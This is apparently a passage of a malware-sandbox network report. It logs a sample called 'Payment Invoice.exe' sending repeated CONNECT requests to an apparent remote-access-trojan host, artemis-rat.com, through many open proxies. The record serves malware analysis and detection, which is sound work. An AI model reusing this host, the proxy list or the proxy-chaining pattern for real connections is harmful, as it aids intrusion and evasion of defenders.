                                                                750192.168.2.452273147.75.34.86100007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.477735996 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:17.785842896 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                751192.168.2.452282114.156.77.10780807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.481170893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.785278082 CET1286INHTTP/1.1 403 Forbidden
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Cache-Control: no-cache
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Content-Type-Options: nosniff
                                                                Content-Length: 4872
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b
                                                                Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet"> <style type="text/css"> body { height: 100%; font-family: Roboto, Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff;


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                752192.168.2.45227247.242.15.120156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.481517076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                753192.168.2.45235247.229.171.15031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.496458054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.214370966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.027034044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.349251032 CET39INHTTP/1.0 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                754192.168.2.452503132.148.245.247262957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.496783018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.026884079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.621465921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.714934111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.824637890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.011570930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.216629028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.527067900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.029297113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                755192.168.2.452506166.62.38.10087307076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.497140884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.980151892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.559168100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.727226019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.874279022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.049119949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183471918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.386379004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.886254072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                756192.168.2.45231737.187.73.7413857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.498836994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.214426994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214663029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.120887041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.824055910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.527234077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.214687109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.620559931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.323587894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                757192.168.2.452304211.222.252.18781977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.498924017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                758192.168.2.452323218.252.244.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.499063015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                759192.168.2.452322152.32.130.117180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.513763905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                760192.168.2.45235772.210.252.13741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.513767004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                761192.168.2.452227175.183.82.22181937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.514112949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                762192.168.2.452456129.213.150.205807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.514328957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                763192.168.2.45228886.107.179.24431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.515753984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.214430094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214797020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.204664946 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                764192.168.2.45230954.233.119.17231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.515881062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.843383074 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                765192.168.2.45147792.204.135.37348247076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.516973019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                766192.168.2.45247638.7.18.10280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.517385960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.438477039 CET19INHTTP/1.1 200 OK
                                                                Mar 11, 2024 16:15:23.448779106 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                767192.168.2.4521705.44.42.115583867076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.519234896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                768192.168.2.45244572.10.160.170295857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.520153999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                769192.168.2.45247551.79.87.144543957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.529974937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                770192.168.2.452300148.66.130.53133057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.530040026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.323627949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.527060986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.621226072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714675903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                771192.168.2.452480146.19.106.193123347076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.530554056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
